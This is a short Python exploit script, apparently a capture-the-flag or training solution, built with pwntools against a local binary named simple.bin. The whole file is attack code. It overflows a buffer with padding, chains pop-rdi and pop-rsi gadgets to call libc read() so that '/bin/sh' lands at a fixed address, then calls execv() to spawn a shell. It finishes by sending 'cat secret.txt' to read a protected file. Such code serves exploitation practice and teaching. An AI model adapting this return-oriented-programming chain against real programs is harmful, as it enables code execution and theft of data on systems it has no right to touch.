/
exploit-simple-3.py
37 lines (32 loc) · 1.13 KB
/
exploit-simple-3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python3
from pwn import *
import time
def exploit():
#exploit logic here.
p = process("./simple.bin")
#forgo investigating the libc library,
#because pwntools does that for us
##can go even further and load libc from the process itself
libc = p.libc
write_address = libc.symbols['write']
read_address = libc.symbols['read']
execv_address = libc.symbols['execv']
print('Address of write() within libc library: {}'.format(hex(write_address)))
print('Address of read() within libc library: {}'.format(hex(read_address)))
print('Address of execv() within libc library: {}'.format(hex(execv_address)))
pop_rdi=p64(0x400673)
nnuull=p64(0x0)
pop_rsi= p64(0x400671)
any_numb=p64(0x12345678)
bins=p64(0x601080)
payload = b'a' * 0x18 + pop_rdi + nnuull +pop_rsi +bins + any_numb + \
p64(read_address) + pop_rdi + bins + pop_rsi + nnuull + any_numb + \
p64(execv_address)
p.send(payload)
p.recvline()
p.send(b'/bin/sh\0')
time.sleep(0.1)
p.sendline(b'cat secret.txt')
print(p.recvline())
if __name__ == "__main__":
exploit()